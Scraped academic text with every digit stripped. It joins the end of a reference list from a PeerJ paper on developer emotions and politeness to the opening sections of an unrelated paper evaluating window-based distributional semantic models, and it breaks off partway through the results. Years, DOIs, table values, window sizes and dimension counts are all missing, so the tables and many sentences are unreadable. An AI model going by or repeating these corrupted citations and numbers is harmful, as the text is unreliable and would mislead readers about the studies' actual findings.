science & business media. campbell dt, stanley jc. . experimental and quasi-experimental designs for generalized causal inference. boston: houghton mifflin. capretz lf. . personality types in software engineering. international journal of human-computer studies ( ): – doi . /s - ( ) - . cockburn a, highsmith j. . agile software development: the people factor. computer : – . curtis b, krasner h, iscoe n. . a field study of the software design process for large systems. communications of the acm ( ): – doi . / . . danescu-niculescu-mizil c, sudhof m, jurafsky d, leskovec j, potts c. . a com- putational approach to politeness with application to social factors. in: proceedings of acl. diebold fx, rudebusch gd. . on the power of dickey-fuller tests against fractional alternatives. economics letters ( ): – doi . / - ( ) -f. ehlers j. . socialness in the recruiting of software engineers. in: proceedings of the th acm international conference on computing frontiers. new york: acm, . erez a, isen am. . the influence of positive affect on the components of expectancy motivation. journal of applied psychology ( ): – doi . / - . . . . fagerholm f, ikonen m, kettunen p, münch j, roto v, abrahamsson p. . how do software developers experience team performance in lean and agile environments? destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /asqu. . . . http://dx.doi.org/ . / . . http://www.agilemanifesto.org http://dx.doi.org/ . / . . http://dx.doi.org/ . /annurev.psych. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . / - ( ) -f http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /peerj-cs. in: proceedings of the th international conference on evaluation and assessment in software engineering. new york: acm, . feldt r, torkar r, angelis l, samuelsson m. . towards individualized software engineering: empirical studies should collect psychometrics. in: proceedings of the international workshop on cooperative and human aspects of software engineering. new york: acm, – . garcia d, zanetti ms, schweitzer f. . the role of emotions in contributors activity: a case study on the gentoo community. in: cloud and green computing (cgc), third international conference on. piscataway: ieee, – . gómez mn, acuña st, genero m, cruz-lemus ja. . how does the extraversion of software development teams influence team satisfaction and software quality? a controlled experiment. international journal of human capital and information technology professionals (ijhcitp) ( ): – doi . /jhcitp. . graziotin d, wang x, abrahamsson p. . happy software developers solve problems better: psychological measurements in empirical software engineering. peerj :e doi . /peerj. . graziotin d, wang x, abrahamsson p. . how do you feel, developer? an explana- tory theory of the impact of affects on programming performance. peerj computer science :e doi . /peerj-cs. . guzman e. a. visualizing emotions in software development projects. in: st ieee working conference on software visualization—proceedings of vissoft . piscataway: ieee, – . guzman e. b. visualizing emotions in software projects. in: software visualization (vissoft), first ieee working conference on. piscataway: ieee, – . guzman e, azócar d, li y. . sentiment analysis of commit comments in github: an empirical study. in: proceedings of the th working conference on mining software repositories—msr . new york: acm press, – . guzman e, bruegge b. . towards emotional awareness in software development teams. in: proceedings of the th joint meeting on foundations of software engineering. new york: acm press, – . hamilton jd. . time series analysis, vol. . princeton university press princeton. herzig k, just s, zeller a. . it’s not a bug, it’s a feature: how misclassification impacts bug prediction. in: proceedings of the international conference on software engineering. piscataway: ieee press, – . jongeling r, datta s, serebrenik a. . choosing your weapons: on sentiment analysis tools for software engineering research. in: software maintenance and evolution (icsme), ieee international conference on. piscataway: ieee, – . kaluzniacky e. . managing psychological factors in information systems work: an orientation to emotional intelligence. hershey: igi global. keyton j, beck sj. . team attributes, processes, and values: a pedagogical framework. business communication quarterly ( ): – doi . / . destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jhcitp. http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. konietschke f, hothorn la, brunner e. . rank-based multiple test procedures and simultaneous confidence intervals. electronic journal of statistics : – doi . / -ejs . kramer adi, guillory je, hancock jt. . experimental evidence of massive-scale emotional contagion through social networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . kri≤toufek l. . measuring correlations between non-stationary series with dcca coefficient. physica a: statistical mechanics and its applications : – doi . /j.physa. . . . kruskal wh, wallis wa. . use of ranks in one-criterion variance analysis. journal of the american statistical association ( ): – doi . / . . . kwiatkowski d, phillips pc, schmidt p, shin y. . testing the null hypothesis of stationarity against the alternative of a unit root: how sure are we that economic time series have a unit root? journal of econometrics ( ): – doi . / - ( ) -y. ljung gm, box ge. . on a measure of lack of fit in time series models. biometrika ( ): – doi . /biomet/ . . . miner ag, glomb tm. . state mood, task performance, and behavior at work: a within-persons approach. organizational behavior and human decision processes ( ): – doi . /j.obhdp. . . . murgia a, concas g, tonelli r, ortu m, demeyer s, marchesi m. a. on the influence of maintenance activity types on the issue resolution time. in: proceedings of the th international conference on predictive models in software engineering. new york: acm, – . murgia a, tourani p, adams b, ortu m. b. do developers feel emotions? an exploratory analysis of emotions in software artifacts. in: proceedings of the th working conference on mining software repositories. new york: acm, – . novielli n, calefato f, lanubile f. . towards discovering the role of emotions in stack overflow. in: proceedings of the th international workshop on social software engineering. new york: acm, – . ortu m, adams b, destefanis g, tourani p, marchesi m, tonelli r. a. are bullies more productive? empirical study of affectiveness vs. issue fixing time. in: proceedings of the th working conference on mining software repositories, msr . ortu m, destefanis g, counsell s, swift s, tonelli r, marchesi m. . arsonists or firefighters? affectiveness in agile software development. in: agile processes, in software engineering, and extreme programming. berlin heidelberg: springer international publishing, – . ortu m, destefanis g, kassab m, counsell s, marchesi m, tonelli r. b. would you mind fixing this issue? an empirical analysis of politeness and attractiveness in software developed using agile boards. in: agile processes, in software engineering, destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / -ejs http://dx.doi.org/ . / -ejs http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . / - ( ) -y http://dx.doi.org/ . /biomet/ . . http://dx.doi.org/ . /j.obhdp. . . http://dx.doi.org/ . /peerj-cs. and extreme programming. berlin heidelberg: springer international publishing, – . ortu m, destefanis g, kassab m, marchesi m. c. measuring and understanding the effectiveness of jira developers communities. in: proceedings of the th international workshop on emerging trends in software metrics, wetsom . ortu m, destefanis g, murgia a, marchesi m, tonelli r, adams b. d. the jira repository dataset: understanding social aspects of software development. in: proceedings of the th international conference on predictive models and data analytics in software engineering. new york: acm, . pang b, lee l. . opinion mining and sentiment analysis. foundations and trends in information retrieval ( – ): – doi . / . panichella s, di sorbo a, guzman e, visaggio ca, canfora g, gall hc. . how can i improve my app? classifying user reviews for software maintenance and evolution. in: software maintenance and evolution (icsme), ieee international conference on. piscataway: ieee, – . pennebaker jw, francis me, booth rj. . linguistic inquiry and word count: liwc . mahway: lawrence erlbaum associates : . perry t. . drifting toward invisibility: the transition to the electronic task board. in: agile, . agile’ . conference. piscataway: ieee, – . pletea d, vasilescu b, serebrenik a. . security and emotion: sentiment analysis of security discussions on github. in: proceedings of the th working conference on mining software repositories. new york: acm, – . priestley mb. . spectral analysis and time series. san diego: academic press. priestley mb. . non-linear and non-stationary time series analysis. amsterda: elsevier. r development core team. . r: a language and environment for statistical comput- ing. vienna: the r foundation for statistical computing. available at http://www.r- project.org/ . rigby pc, hassan ae. . what can oss mailing lists tell us? a preliminary psycho- metric text analysis of the apache developer mailing list. in: proceedings of the fourth international workshop on mining software repositories. piscataway: ieee computer society, . roberts ja, hann i-h, slaughter sa. . understanding the motivations, participa- tion, and performance of open source software developers: a longitudinal study of the apache projects. management science ( ): – doi . /mnsc. . . rousinopoulos a-i, robles g, gonzález-barahona jm. . sentiment analysis of free/open source developers: preliminary findings from a case study. revista eletrônica de sistemas de informação ( ): – doi . /resi. said se, dickey da. . testing for unit roots in autoregressive-moving average models of unknown order. biometrika ( ): – doi . /biomet/ . . . siegel s. . nonparametric statistics for the behavioral sciences. new york: mcgraw- hill. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://www.r-project.org/ http://www.r-project.org/ http://dx.doi.org/ . /mnsc. . http://dx.doi.org/ . /resi http://dx.doi.org/ . /biomet/ . . http://dx.doi.org/ . /peerj-cs. ëliwerski j, zimmermann t, zeller a. . don’t program on fridays! how to locate fix-inducing changes. in: proceedings of the th workshop software reengineering. available at http://thomas-zimmermann.com/publications/files/sliwerski-wsr- . pdf . steinmacher i, conte tu, gerosa m, redmiles d. . social barriers faced by newcomers placing their first contribution in open source software projects. in: proceedings of the th acm conference on computer supported cooperative work & social computing. new york: acm, – . tan s, howard-jones p. . rude or polite: do personality and emotion in an artificial pedagogical agent affect task performance? in: global conference on teaching and learning with technology (ctlt ). . tourani p, jiang y, adams b. . monitoring sentiment in open source mailing lists: exploratory study on the apache ecosystem. in: proceedings of th annual international conference on computer science and software engineering. armonk: ibm corporation, – . available at http://mcis.soccerlab.polymtl.ca/publications/ / cascon .pdf . tsay j, dabbish l, herbsleb j. . let’s talk about it: evaluating contributions through discussion in github. in: proceedings of the nd acm sigsoft international symposium on foundations of software engineering. new york: acm, – . tukey jw. . comparing individual means in the analysis of variance. biometrics ( ): – doi . / . vasilescu b, filkov v, serebrenik a. . stack overflow and github: associations between software development and crowdsourced knowledge. in: social computing (socialcom), international conference on. piscataway: ieee, – . vasilescu b, serebrenik a, goeminne m, mens t. a. on the variation and special- isation of workload—a case study of the gnome ecosystem community. empirical software engineering ( ): – doi . /s - - - . vasilescu b, serebrenik a, mens t, van den brand mgj, pek e. b. how healthy are software engineering conferences? science of computer programming : – doi . /j.scico. . . . versionone. . th annual state of agile survey report. san francisco: versionone. available at https://www.versionone.com/pdf/ -state-of-agile-survey.pdf . weiss c, premraj r, zimmermann t, zeller a. . how long will it take to fix this bug? in: proceedings of the fourth international workshop on mining software repositories. piscataway: ieee computer society, . winschiers h, paterson b. . sustainable software development. in: proceedings of the annual research conference of the south african institute of computer scientists and information technologists on it research in developing countries. south african institute for computer scientists and information technologists, – . yamashita k, kamei y, mcintosh s, hassan ae, ubayashi n. . magnet or sticky? measuring project characteristics from the perspective of developer attraction and retention. journal of information processing ( ): – doi . /ipsjjip. . . destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://thomas-zimmermann.com/publications/files/sliwerski-wsr- .pdf http://thomas-zimmermann.com/publications/files/sliwerski-wsr- .pdf http://mcis.soccerlab.polymtl.ca/publications/ /cascon .pdf http://mcis.soccerlab.polymtl.ca/publications/ /cascon .pdf http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.scico. . . http://dx.doi.org/ . /j.scico. . . https://www.versionone.com/pdf/ -state-of-agile-survey.pdf http://dx.doi.org/ . /ipsjjip. . http://dx.doi.org/ . /ipsjjip. . http://dx.doi.org/ . /peerj-cs. yamashita k, mcintosh s, kamei y, ubayashi n. . magnet or sticky? an oss project-by-project typology. in: proceedings of the th working conference on mining software repositories. new york: acm, – . zhang h, gong l, versteeg s. . predicting bug-fixing time: an empirical study of commercial software projects. in: proceedings of the international conference on software engineering. piscataway: ieee press, – . zhang f, khomh f, zou y, hassan ae. . an empirical study on factors impacting bug fixing time. in: th working conference on reverse engineering (wcre). piscataway: ieee, – . destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a large scale evaluation of distributional semantic models: parameters, interactions and model selection gabriella lapesa , universität osnabrück institut für kognitionswissenschaft albrechtstr. , osnabrück, germany gabriella.lapesa@fau.de stefan evert fau erlangen-nürnberg professur für korpuslinguistik bismarckstr. , erlangen, germany stefan.evert@fau.de abstract this paper presents the results of a large-scale evaluation study of window-based distribu- tional semantic models on a wide variety of tasks. our study combines a broad coverage of model parameters with a model selection methodology that is robust to overfitting and able to capture parameter interactions. we show that our strategy allows us to identify pa- rameter configurations that achieve good per- formance across different datasets and tasks . introduction distributional semantic models (dsms) are em- ployed to produce semantic representations of words from co-occurrence patterns in texts or documents (sahlgren, ; turney and pantel, ). build- ing on the distributional hypothesis (harris, ), dsms quantify the amount of meaning shared by words as the degree of overlap of the sets of contexts in which they occur. a widely used approach operationalizes the set of contexts as co-occurrences with other words within a certain window (e.g., words). a window-based dsm can be represented as a co-occurrence matrix in which rows correspond to target words, columns correspond to context words, and cells store the co- occurrence frequencies of target words and context words. the co-occurrence information is usually weighted by some scoring function and the rows of the matrix are normalized. since the co-occurrence the analysis presented in this paper is complemented by supplementary materials, which are available for download at http://www.linguistik.fau.de/dsmeval/. this page will also be kept up to date with the results of follow-up experiments. matrix tends to be very large and sparsely popu- lated, dimensionality reduction techniques are often used to obtain a more compact representation. lan- dauer and dumais ( ) claim that dimensionality reduction also improves the semantic representation encoded in the co-occurrence matrix. finally, dis- tances between the row vectors of the matrix are computed and – according to the distributional hy- pothesis – interpreted as a correlate of the semantic similarities between the corresponding target words. the construction and use of a dsm involves many design choices, such as: selection of a source cor- pus, size of the co-occurrence window; choice of a suitable scoring function, possibly combined with an additional transformation; whether to apply dimen- sionality reduction, and the number of reduced di- mensions; metric for measuring distances between vectors. different design choices – technically, the dsm parameters – can result in quite different sim- ilarities for the same words (sahlgren, ). dsms have already proven successful in model- ing lexical meaning: they have been applied in natu- ral language processing (schütze, ; lin, ), information retrieval (salton et al., ), and cog- nitive modeling (landauer and dumais, ; lund and burgess, ; padó and lapata, ; ba- roni and lenci, ). recently, the field of dis- tributional semantics has moved towards new chal- lenges, such as predicting brain activation (mitchell et al., ; murphy et al., ; bullinaria and levy, ) and modeling meaning composition (baroni et al., , and references therein). despite such progress, a full understanding of the different parameters governing a dsm and their in- fluence on model performance has not been achieved yet. the present paper is a contribution towards this transactions of the association for computational linguistics, vol. , pp. – , . action editor: janyce wiebe. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. goal: it presents the results of a large-scale evalua- tion of window-based dsms on a wide variety of se- mantic tasks. more complex tasks building on distri- butional representations (e.g., vector composition or relational analogies) will also benefit from our find- ings, allowing them to choose optimal parameters for the underlying word-level dsms. at the level of parameter coverage, this work eval- uates most of the relevant parameters considered in comparable state-of-the-art studies (bullinaria and levy, ; bullinaria and levy, ); it also in- troduces an additional one, which has received lit- tle attention in the literature: the index of distribu- tional relatedness, which connects distances in the dsm space to semantic similarity. we compare direct use of distance measures to neighbor rank. neighbor rank has already been successfully used to model priming effects with dsms (hare et al., ; lapesa and evert, ); the present study extends its evaluation to standard tasks. we show that neigh- bor rank consistently improves the performance of dsms compared to distance, but the degree of this improvement varies from task to task. at the level of task coverage, the present study includes most of the standard datasets used in com- parative studies (bullinaria and levy, ; baroni and lenci, ; bullinaria and levy, ). we consider three types of evaluation tasks: multiple choice (toefl test), correlation to human similar- ity ratings, and semantic clustering. at the level of methodology, our work adopts the approach to model selection proposed by lapesa and evert ( ), which is described in detail in section . our results show that parameter interactions play a crucial role in determining model performance. this paper is structured as follows. section briefly reviews state-of-the-art studies on dsm eval- uation. section describes the experimental setting in terms of tasks and evaluated parameters. sec- tion outlines our methodology for model selection. in section we report the results of our evaluation study. finally, section summarizes the main find- ings and sketches ongoing and future work. previous work in this section we summarize the results of previous evaluation studies of distributional semantic mod- els. among the existing work on dsm evaluation, we can identify two main types of approaches. one possibility is to evaluate a distributional model with certain new features on a range of tasks, applying little or no parameter tuning, and to com- pare it to competing models; examples are pado and lapata’s ( ) dependency vectors as well as baroni and lenci’s ( ) distributional mem- ory. since both studies focus on testing a single new model with fixed parameters (or a small number of new models), we will not go into further detail con- cerning them. alternatively, the evaluation may be conducted via incremental tuning of parameters, which are tested sequentially to identify their best perform- ing values on a number of tasks, as has been done by bullinaria and levy ( ; ), polajnar and clark ( ), and kiela and clark ( ). bullinaria and levy ( ) report on a system- atic study of the impact of a number of parame- ters (shape and size of the co-occurrence window, distance metric, association score for co-occurrence counts) on a number of tasks (including the toefl synonym task, which is also evaluated in our study). evaluated models were based on the british na- tional corpus. bullinaria and levy ( ) found that vectors scored with pointwise mutual informa- tion, built from very small context windows with as many context dimensions as possible, and using co- sine distance ensured the best performance across all tasks at issue. bullinaria and levy ( ) extend the evaluation reported in bullinaria and levy ( ). starting from the optimal configuration identified in the first study, they test the impact of three further parame- ters: application of stop-word lists, stemming, and dimensionality reduction using singular value de- composition. dsms were built from the ukwac corpus, and evaluated on a number of tasks (includ- ing toefl and noun clustering on the dataset of mitchell et al. ( ), also evaluated in our study). neither stemming nor the application of stop-word lists resulted in a significant improvement of dsm performance. positive results were achieved by per- forming svd dimensionality reduction and discard- ing the initial components of the reduced matrix. polajnar and clark ( ) evaluate the impact of context selection (for each target, only the most rel- evant context words are selected, and the remaining vector entries are set to zero) and vector normaliza- tion (used to vary model sparsity and the range of values of the dsm vectors) in standard tasks related to word and phrase similarity. context selection and normalization improved dsm performance on word similarity and compositional tasks, both with and without svd. kiela and clark ( ) evaluate window-based and dependency-based dsms on a variety of tasks related to word and phrase similarity. a wide range of parameters are involved in this study: source corpus, window size, number of context dimen- sions, use of stemming, lemmatization and stop- words, similarity metric, score for feature weight- ing. best results were obtained with large corpora and small window sizes, around context di- mensions, stemming, positive mutual information, and a mean-adjusted version of cosine distance. even though we adopt a different approach than these incremental tuning studies, there is consider- able overlap in the evaluated parameters and tasks, which will be pointed out in section . an alternative to incremental tuning is the methodology proposed by lapesa and evert ( ) and lapesa et al. ( ). they systematically test a large number of parameter combinations and use linear regression to determine the importance of in- dividual parameters and their interactions. as their evaluation methodology is adopted in the present work and described in more detail in section , we will not discuss it here and instead focus on the main results. dsms are evaluated in the task of modeling semantic priming. this task, albeit not standard in dsm evaluation, is of great interest as priming ex- periments provide a window into the structure of the mental lexicon. both studies showed that neighbor rank outperforms distance in capturing priming ef- fects. they also found that the scoring function has a crucial influence on model performance and inter- acts strongly with an additional logarithmic transfor- mation. lapesa et al. ( ) focused on a compari- son of syntagmatic and paradigmatic relations. they found that discarding the initial svd dimensions is only benefical for certain relations, suggesting that these dimensions may encode syntagmatic informa- tion if larger context windows are used. concerning the scope of the evaluation, both studies consider a wide range of parameters but target only a very spe- cific task. our study aims at extending their parame- ter set and evaluation methodology to standard tasks. experimental setting . tasks the evaluation of dsms has been conducted on three standard types of semantic tasks. the first task is a multiple choice setting: distri- butional relatedness between a target word and two or more other words is used to select the best, i.e. most similar candidate. performance in this task is quantified by the decision accuracy. the evaluated dataset is the well-known toefl multiple-choice synonym test (landauer and dumais, ), which was also included in the studies of bullinaria and levy ( ; ) and kiela and clark ( ). in the second task, we measure the correla- tion between distributional relatedness and native speaker judgments of semantic similarity or related- ness. following previous studies (baroni and lenci, ; padó and lapata, ), performance in this task is quantified in terms of pearson correlation. evaluated datasets are the rubenstein and goode- nough dataset (rg ) of noun pairs (rubenstein and goodenough, ), also evaluated by kiela and clark ( ), and the wordsim- dataset (ws ) of noun pairs (finkelstein et al., ), included in the study of polajnar and clark ( ). the third evaluation task is noun clustering: distributional similarity between words is used to assign them to a pre-defined number of semantic classes. performance in this task is quantified in terms of cluster purity. clustering is performed with an algorithm based on partitioning around medoids (kaufman and rousseeuw, , ch. ), using the the parameter set of lapesa et al. ( ) fully corresponds to the one used in the present study. some other evaluation studies adopt spearman’s rank cor- relation ρ , which is more appropriate if there is a non-linear re- lation between distributional relatedness and the human judge- ments. we computed both coefficients in our experiments and decided to report pearson’s r for three reasons: (i) baroni and lenci ( ) already list r scores for a wide range of dsms in this task; (ii) in most experimental runs, ρ and r values were quite similar, with a tendency for ρ to be slightly lower then r (difference of means rg : . ; ws : . ); (iii) lin- ear regression analyses for ρ and r showed the same trends and patterns for all dsm parameters. r function pam with standard settings. evaluated datasets for the clustering task are the almuhareb- poesio set (henceforth, ap) containing nouns grouped into classes (almuhareb, ); the bat- tig set, containing concrete nouns grouped into classes (van overschelde et al., ); the ess- lli set, containing concrete nouns grouped into classes; and the mitchell set, containing nouns grouped into classes (mitchell et al., ), also employed by bullinaria and levy ( ). . parameters dsms evaluated in this paper belong to the class of window-based models. all models use the same large vocabulary of target words ( lemma types), which is based on the vocabulary of distri- butional memory (baroni and lenci, ) and has been extended to cover all items in our datasets. dis- tributional models were built using the ucs toolkit and the wordspace package for r (evert, ). the following parameters have been evaluated: • source corpus (abbreviated in the plots as cor- pus): the corpora from which we compiled our dsms differ in both size and quality, and they rep- resent standard choices in dsm evaluation. eval- uated corpora in this study are: british national corpus ; ukwac; wackypedia en ; • context window: – direction* (win.direction): we collected co- occurrence counts both using a directed win- dow (i.e., separate co-occurrence counts for other clustering studies have often been carried out us- ing the cluto toolkit (karypis, ) with standard settings, which corresponds to spectral clustering of the distributional vectors. unlike pam, which operates on a pre-computed dis- similarity matrix, cluto cannot be used to test different dis- tance measures or neighbor rank. comparative clustering ex- periments showed no substantial differences for cosine similar- ity; in the rank-based setting, pam consistently outperformed cluto clustering. http://wordspace.collocations.de/doku.php/data: esslli :concrete nouns categorization http://www.collocations.de/software.html parameters also evaluated by bullinaria and levy ( ; ), albeit with a different range of values, are marked with an asterisk (*); those evaluated by kiela and clark ( ) and/or polajnar and clark ( ) are marked with a dagger (†). http://www.natcorp.ox.ac.uk/ both ukwac and wackypedia en are available from http: //wacky.sslmit.unibo.it/doku.php?id=corpora. context words to the left and to the right of the target) and an undirected window (no distinc- tion between left and right context); – size (win.size)*†: we expect this parameter to be crucial as it determines the amount of shared context involved in the computation of similar- ity. we tested windows of , , , , and words to the left and right of the target, limited by sentence boundaries; • context selection: context words are filtered by part-of-speech (nouns, verbs, adjectives, and ad- verbs). from the full co-occurrence matrix, we further select dimensions (i.e., columns, corre- sponding to context words) according to the fol- lowing two parameters: – criterion for context selection (criterion): marginal frequency; number of nonzero co- occurrence counts; – threshold for context selection (con- text.dim)*†: from the context dimensions ranked according to this criterion, we select the top , , , or dimensions; • score for feature weighting (score)*†: we com- pare plain co-occurrence frequency to tf.idf and to the following association measures: dice coeffi- cient; simple log-likelihood; mutual information (mi); t-score; z-score; • feature transformation (transformation): to re- duce the skewness of feature scores, it is possible to apply a transformation function. we evaluate square root, sigmoid (tanh) and logarithmic trans- formation vs. no transformation. see evert ( ) for a thorough description of the asso- ciation measures and details on their calculation (fig. . on p. and fig. . on p. ). we selected these measures because they have widely been used in previous work on dsms (tf.idf, mi and log-likelihood) or are popular choices for the identification of multiword expressions. based on statistical hy- pothesis tests, log-likelihood, t-score and z-score measure the significance of association between a target and feature term; mi shows how much more frequently they co-occur than ex- pected by chance; and dice captures the mutual predictability of target and feature term. note that we compute sparse ver- sions of the association measures with negative values clamped to zero in order to preserve the sparseness of the co-occurrence matrix. for example, our mi measure corresponds to positive mi in the other evaluation studies. • distance metric (metric)*†: cosine distance (i.e., angle between vectors); manhattan distance ; • dimensionality reduction: we optionally apply singular value decomposition to dimen- sions, using randomized svd (halko et al., ) for performance reasons. for the svd-based models, there are two additional parameters: – number of latent dimensions (red.dim): out of the svd dimensions, we select the first , , , , dimensions (i.e. those with the largest singular values); – number of skipped dimensions (dim.skip): when selecting the reduced dimensions, we ex- clude the first , or dimensions. this parameter has already been evaluated by bulli- naria and levy ( ), who achieved best per- formance by discarding the initial components of the reduced matrix, i.e., those with the high- est variance. • index of distributional relatedness (rel.index). given two words a and b represented in a dsm, we consider two alternative ways of quantify- ing the degree of relatedness between a and b. the first option (and standard in dsm model- ing) is to compute the distance (cosine or man- hattan) between the vectors of a and b. the al- ternative choice, proposed in this work, is based on neighbor rank. neighbor rank has already been successfully used for capturing priming ef- fects (hare et al., ; lapesa and evert, ; lapesa et al., ) and for quantifying the se- mantic relatedness between derivationally related words (zeller et al., ); however, its perfor- mance on standard tasks has not been tested yet. for the toefl task, we compute rank as the po- sition of the target among the nearest neighbors of each synonym candidate. for the correla- in this study, the range of evaluated metrics is restricted to cosine vs. manhattan for a number of reasons: (i) cosine is con- sidered a standard choice in dsm modeling and is adopted by most evaluation studies (bullinaria and levy, ; bullinaria and levy, ; polajnar and clark, ); (ii) for our normal- ized vectors, euclidean distance is fully equivalent to cosine; (iii) preliminary experiments with the maximum distance mea- sure resulted in very low performance. note that using the positions of the synonym candidates among the neighbors of the target would have been equivalent to direct use of the distance measure, since the transformation from distance to rank is monotonic in this case. tion and clustering tasks, we compute a symmetric rank measure as the average of log rank(a,b) and log rank(b,a). an exploration of the effects of di- rectionality on the prediction of similarity ratings and its use in clustering tasks (i.e., experiments involving rank(a,b) and rank(b,a) as indexes of relatedness) is left for future work. model selection as has already been pointed out in the introductory section, one of the main open issues in dsm eval- uation is the need for a systematic investigation of the interactions between dsm parameters. another issue that large-scale evaluation studies face is over- fitting: if a large number of models (i.e. parameter combinations) is evaluated, it makes little sense to look at the best model (i.e. the best parameter com- bination), which will be subject to heavy overfit- ting, especially on small datasets such as toefl. the methodology for model selection applied in this work successfully addresses both issues. in our evaluation study, we tested all possible combinations of the parameters described in sec- tion . . this resulted in a total of model runs ( in the unreduced setting, in the dimensionality-reduced setting). the models were generated and evaluated on a large hpc cluster within approximately weeks. following lapesa and evert ( ), dsm pa- rameters are considered predictors of model perfor- mance: we analyze the influence of individual pa- rameters and their interactions using general linear models with performance (accuracy, correlation, pu- rity) as a dependent variable and the model parame- ters as independent variables, including all two-way interactions. more complex interactions are beyond the scope of this paper and are left for future work. analysis of variance – which is straightforward for our full factorial design – is used to quantify the im- portance of each parameter or interaction. robust optimal parameter settings are identified with the help of effect displays (fox, ), which show the partial effect of one or two parameters by marginal- izing over all other parameters. unlike coefficient estimates, they allow an intuitive interpretation of the effect sizes of categorical variables irrespective of the dummy coding scheme used. results this section reports the results of the modeling ex- periments outlined in section . table summarizes the evaluation results: for each dataset, we report minimum, maximum and mean performance, com- paring unreduced and reduced runs. the column difference of means shows the average difference in performance between an unreduced model and its reduced counterpart (with dimensionality reduction parameters set to the values of the general best set- ting identified in section . ) and the p-value of a wilcoxon signed rank test with continuity correc- tion.it is evident that dimensionality reduction im- proves model performances for all datasets . dataset unreduced reduced difference min max mean min max mean of means toefl . . . . . . − . *** rg . . . . . . − . *** ws . . . . . . − . *** ap . . . . . . . n.s. battig . . . . . . − . *** esslli . . . . . . − . * mitch. . . . . . . − . *** table : summary of performance while the improvements are only minimal in some cases, dimensionality reduction never has a detrimental effect while offering practical advan- tages in memory usage and computation speed. therefore, in our analysis, we focus on the runs in- volving dimensionality reduction. in the following subsections, we present detailed results for each of the three tasks. in each case, we first discuss the im- pact of dsm parameters on performance, and then describe the optimal parameter values. . toefl in the toefl task, the linear model achieves an ad- justed r of %, showing that it explains the influ- ence of model parameters on toefl accuracy very well. figure displays the ranking of the evaluated parameters according to their importance in a fea- ture ablation setting. the r values in the plots re- fer to the proportion of variance explained by the re- spective parameter together with all its interactions, * = p < . ; *** = p < . ; n.s. = not significant. difference of means and wilcoxon p-value on spear- man’s rho for ratings datasets: rg , − . ***; ws , − . ***. corresponding to the reduction in adjusted r if this parameter is left out. we do not rely on significance values for model selection because, given the large number of measurements, virtually all parameters have a highly significant effect. criterion rel.index win.direction win.size context.dim corpus red.dim dim.skip transformation score metric partial r toefl figure : toefl, parameters and feature ablation table reports all parameter interactions for the toefl task that explain more than . % of the total variance (i.e. r ≥ . %), as well as the correspond- ing degrees of freedom (df) and r . interaction df r score:transf . metric:dim.skip . score:metric . metric:context.dim . win.size:transf . corpus:score . score:context.dim . metric:red.dim . table : toefl task: interactions, r on the basis of their influence in determining model performance, we can identify three parame- ters that are crucial for the toefl task, and which will also turn out to be very influential in the other tasks at issue: distance metric, feature score and fea- ture transformation. the best distance metric is cosine distance: this is one of the consistent findings of our evalua- tion study and it is in accordance with bullinaria and levy ( ) and, to a lesser extent, kiela and clark ( ). score and transformation al- ways have a fundamental impact on model perfor- in kiela and clark ( ), cosine is reported to be the best similarity metric, together with the correlation similarity metric ● ● ● ● ● ● ● frequency tf.idf mi dice simple−ll t−score z−score transformation ● none log root sigmoid figure : toefl, score / transformation ● ● ● ● ● transformation ● none log root sigmoid figure : toefl, window size / transformation ● ● ● ● metric ● cosine manhattan figure : toefl, metric / n. of latent dim. ● ● ● metric ● cosine manhattan figure : toefl, metric / n. of skipped dim. mance: these parameters affect the distributional space independently of tasks and datasets. we will show that they are systematically involved in a strong interaction and that it is possible to iden- tify a score/transformation combination with robust performance across all tasks. the interaction be- tween score and transformation is displayed in fig- ure . the best results are achieved by association measures based on significance tests (simple-ll, t- score, z-score), followed by mi. this result is in line with previous studies (bullinaria and levy, ; kiela and clark, ), which found pointwise mi or positive mi to be the best feature scores. the best choice, simple-log likelihood, exhibits a strong vari- ation in performance across different transforma- tions. for all three significance measures, the best feature transformation is consistently a logarithmic transformation. raw co-occurrence frequency, tf.idf and dice only perform well in combination with a square root transformation. the best window size, as shown in figure , is a -word window for all evaluated transformations. (a mean-adjusted version of cosine similarity). the latter, how- ever, turned out to be more robust across different corpora and weighting schemes. the svd parameters (number of latent dimen- sions and number of skipped dimensions) play a significant role in determining model performance. they are particularly important for the toefl task, but we will see that their explanatory power is also quite strong in the other tasks. interestingly, they show a tendency to participate in interactions with other parameters, but do not interact among them- selves. we display the interaction between metric and number of latent dimensions in figure : the steep performance increase for both metrics shows that the widely-used choice of latent dimen- sions (landauer and dumais, ) is suboptimal for the toefl task. the best value in our exper- iment is latent dimensions, and additional di- mensions would probably lead to a further improve- ment. the interaction between metric and number of skipped dimensions is displayed in figure . while manhattan performs poorly no matter how many di- mensions are skipped, cosine is positively affected by skipping and (to a lesser extent) dimen- sions. the latter trend has already been discussed by bullinaria and levy ( ). inspection of the remaining interaction plots, not shown here for reasons of space, reveals that the best dsm performance in the toefl task is achieved by selecting ukwac as corpus and original di- mensions. the index of distributional relatedness has a very low explanatory power in the toefl task, with neighbor rank being the best choice (see plots and in section . ). given the minimal explanatory power of the di- rection of the context window and the criterion for context selection in all three tasks, we will not fur- ther consider these parameters in our analysis. we recommend to set them to an “unmarked” option: undirected and frequency. the best setting identified by inspecting all effects is shown in table , together with its performance and with the performance of the (over-trained) best model in this task. parameters of the latter are re- ported in appendix a. . ratings figure displays the importance of the evaluated pa- rameters in the task of predicting similarity ratings. parameters 